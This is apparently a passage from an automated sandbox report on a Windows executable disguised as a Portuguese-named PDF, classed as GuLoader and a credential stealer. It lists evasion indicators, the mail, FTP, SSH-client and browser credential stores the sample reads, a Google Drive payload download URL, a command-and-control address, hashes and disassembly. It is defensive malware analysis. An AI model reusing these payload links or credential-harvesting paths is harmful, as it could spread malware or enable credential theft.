      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW'
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ACEC8 rdtsc 0_2_020ACEC8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADAD0 mov eax, dword ptr fs:[00000030h]0_2_020ADAD0
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AC6DF mov eax, dword ptr fs:[00000030h]0_2_020AC6DF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ABA35 mov eax, dword ptr fs:[00000030h]0_2_020ABA35
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADB37 mov eax, dword ptr fs:[00000030h]0_2_020ADB37
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8EE2 mov eax, dword ptr fs:[00000030h]0_2_020A8EE2
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AA1B2 LdrInitializeThunk,0_2_020AA1B2
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe" Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Tries to steal Mail credentials (via file / registry access)Show sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
      Tries to harvest and steal ftp login credentialsShow sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping2Security Software Discovery311Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion211Credentials in Registry1Virtualization/Sandbox Evasion211Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerApplication Window Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Anexo I e II do convite#U00b7pdf.exe30%VirustotalBrowse
      Anexo I e II do convite#U00b7pdf.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      13.0.Anexo I e II do convite#U00b7pdf.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
      13.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
      13.0.Anexo I e II do convite#U00b7pdf.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File
      0.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
      13.0.Anexo I e II do convite#U00b7pdf.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
      0.2.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://63.250.34.171/tickets.php?id=1560%Avira URL Cloudsafe
      https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		216.58.209.46
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		216.58.208.129
        		truefalse
          		high
          doc-0g-14-docs.googleusercontent.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://63.250.34.171/tickets.php?id=156true
            • Avira URL Cloud: safe
            		unknown
            https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=downloadfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://doc-0g-14-docs.googleusercontent.com/Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmpfalse
                		high
                https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpfalse
                  		high
                  https://drive.google.com/iAnexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmpfalse
                    		high
                    https://drive.google.com/Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmpfalse
                      		high
                      https://csp.withgoogle.com/csp/report-to/gse_l9ocaqAnexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      63.250.34.171
                      		unknownUnited States
                      		22612NAMECHEAP-NETUStrue
                      216.58.208.129
                      		googlehosted.l.googleusercontent.comUnited States
                      		15169GOOGLEUSfalse
                      216.58.209.46
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:531208
                      Start date:30.11.2021
                      Start time:15:32:13
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 56s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:Anexo I e II do convite#U00b7pdf.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 0.2% (good quality ratio 0.1%)
                      • Quality average: 34%
                      • Quality standard deviation: 39.1%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:34:09API Interceptor1x Sleep call for process: Anexo I e II do convite#U00b7pdf.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      63.250.34.171QfXk1qRIDN.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      P.I..xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Lkinv70923.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=550
                      ODkVvBA5vb.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=538
                      loader2.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=550
                      3MBqpjNC1q.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      Ship particulars.xlsxGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=537
                      DHL Receipt_AWB8114704847788.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=552
                      HalkbankEkstre20211124073809405251,pdf.exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=562
                      Order EnquiryCRM0754000001965-pdf(109KB).exeGet hashmaliciousBrowse
                      • 63.250.34.171/tickets.php?id=544

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      NAMECHEAP-NETUSPurchase Order.exeGet hashmaliciousBrowse
                      • 198.187.31.121
                      Linux_amd64Get hashmaliciousBrowse
                      • 198.54.115.142
                      Linux_x86Get hashmaliciousBrowse
                      • 185.61.153.120
                      hNfqWik7qw.exeGet hashmaliciousBrowse
                      • 198.54.117.244
                      RFQ...3463#.exeGet hashmaliciousBrowse
                      • 198.54.117.218
                      0cgyGHN5k8.exeGet hashmaliciousBrowse
                      • 198.54.117.211
                      QfXk1qRIDN.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      s8b4XYptUi.exeGet hashmaliciousBrowse
                      • 198.54.117.215
                      Dhl_AWB5032675620,pdf.exeGet hashmaliciousBrowse
                      • 198.54.121.168
                      ASEA METAL-PRODUCT LIST294#U007eMB - Copy.docGet hashmaliciousBrowse
                      • 198.54.117.211
                      Quotation - Linde Tunisia PLC....xlsxGet hashmaliciousBrowse
                      • 198.54.117.210
                      P.I..xlsxGet hashmaliciousBrowse
                      • 63.250.34.171
                      Orden econo-002162.pdf.exeGet hashmaliciousBrowse
                      • 198.54.122.60
                      vbc.exeGet hashmaliciousBrowse
                      • 198.54.117.218
                      scan doc_0112000021.exeGet hashmaliciousBrowse
                      • 198.54.117.212
                      payment advice_29011021.exeGet hashmaliciousBrowse
                      • 198.54.125.56
                      BL_CI_PL.exeGet hashmaliciousBrowse
                      • 192.64.119.254
                      KLL.SZX 202110 D27365.exeGet hashmaliciousBrowse
                      • 198.187.31.108
                      Lkinv70923.exeGet hashmaliciousBrowse
                      • 63.250.34.171
                      MesxDvlCE0.exeGet hashmaliciousBrowse
                      • 199.192.28.206

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      37f463bf4616ecd445d4a1937da06e197UxX7VCtH5.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      ph.htmGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      tr.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      counter-1389180325.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      7Q8PBbf6W1.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      desc-1753454091.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      uI6mJo4TJQ.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      ggLhVts2RG.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      uI6mJo4TJQ.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      5ZNjNuKyMn.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      desc-1196210401.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      desc-1257712778.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      win-1776374194.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      wvYbWkOPqJ.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      wvYbWkOPqJ.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      QOnVnFwt66.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      Order confirmation.214254257766.PDF.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      098765545355.DOC.exeGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      win-1529645453.xlsGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46
                      Download_Statement_(0 seconds).htmGet hashmaliciousBrowse
                      • 216.58.208.129
                      • 216.58.209.46

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                      Process:C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                      Process:C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):46
                      Entropy (8bit):1.0424600748477153
                      Encrypted:false
                      SSDEEP:3:/lbON:u
                      MD5:89CA7E02D8B79ED50986F098D5686EC9
                      SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                      SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                      SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ........................................user.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):5.91903718028051
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Anexo I e II do convite#U00b7pdf.exe
                      File size:115928
                      MD5:e779a8be256d298c6d96884724d7792b
                      SHA1:5ff1cb154e5001791e3dd019721462fe20bfec80
                      SHA256:9dbfeb5b6cdf7f40899f2f36ecd59d8c1f72ec680248e4b42f69496c61b5d19c
                      SHA512:0eeb559b54c2beef79378f71bc147575493f5d859ca814ddfcb46f340a7afebcf02297ddce03985772366ec30be8c10000e843a27da5958d7c6d3e8109925232
                      SSDEEP:1536:7TkM4c0waCt/4ut/3ZlS/VONFjeh8JdThM78iK40n8VV0fRyqA:70cJvlS/VOrjehaTOJX0cV0fYqA
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L.....|Q.....................0....................@........................

                      File Icon

                      Icon Hash:20047c7c70f0e004

                      Static PE Info

                      General

                      Entrypoint:0x40131c
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x517CF201 [Sun Apr 28 09:55:13 2013 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:bee9d652e25bf42465265f6582df5734

                      Authenticode Signature

                      Signature Valid:false
                      Signature Issuer:E=Form_adepterhak@Form_SEMIJURID.For, CN=Form_Kalmuknuda1, OU=Form_Anthro5, O=Form_calycul, L=Form_RHAPHESSAM, S=Form_PILLMONGER, C=BI
                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                      Error Number:-2146762487
                      Not Before, Not After
                      • 11/29/2021 10:51:24 PM 11/29/2022 10:51:24 PM
                      Subject Chain
                      • E=Form_adepterhak@Form_SEMIJURID.For, CN=Form_Kalmuknuda1, OU=Form_Anthro5, O=Form_calycul, L=Form_RHAPHESSAM, S=Form_PILLMONGER, C=BI
                      Version:3
                      Thumbprint MD5:68C592CF7D2A2CD03819360F614D08CB
                      Thumbprint SHA-1:58E1AF7458716DFDE5ADA2192843C20FBD7A889B
                      Thumbprint SHA-256:432C10C7212D08B58F637E3CE97AAB0DD33BB301385662BFD13000B22CBEA931
                      Serial:00

                      Entrypoint Preview

                      Instruction
                      push 00401A5Ch
                      call 00007F4570B75513h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      inc eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dl, ah
                      stc
                      out dx, eax
                      out 7Bh, eax
                      mov esp, E296443Ch
                      call 00007F4569889E55h
                      je 00007F4570B75522h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, ah
                      sar cl, cl
                      add al, byte ptr [esi+6Fh]
                      jc 00007F4570B7558Fh
                      pop edi
                      dec ecx
                      dec esi
                      inc esp
                      dec esp
                      inc ebp
                      dec edx
                      push edx
                      inc ebp
                      add byte ptr [ecx+00h], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      dec esp
                      xor dword ptr [eax], eax
                      push es

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x192640x28.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x929.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1b0000x14d8
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2200x20
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x140.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x1845c0x19000False0.4708984375data6.01648433856IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .data0x1a0000x1c140x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x1c0000x9290x1000False0.177490234375data2.02437129548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      OK0x1c9040x25ASCII text, with CRLF line terminatorsEnglishUnited States
                      RT_ICON0x1c7d40x130data
                      RT_ICON0x1c4ec0x2e8data
                      RT_ICON0x1c3c40x128GLS_BINARY_LSB_FIRST
                      RT_GROUP_ICON0x1c3940x30data
                      RT_VERSION0x1c1a00x1f4dataChineseTaiwan

                      Imports

                      DLLImport
                      MSVBVM60.DLLMethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                      Version Infos

                      DescriptionData
                      Translation0x0404 0x04b0
                      ProductVersion1.00
                      InternalNameForm_reduc
                      FileVersion1.00
                      OriginalFilenameForm_reduc.exe
                      ProductNameForm_INDLEJRE

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      ChineseTaiwan

                      Network Behavior

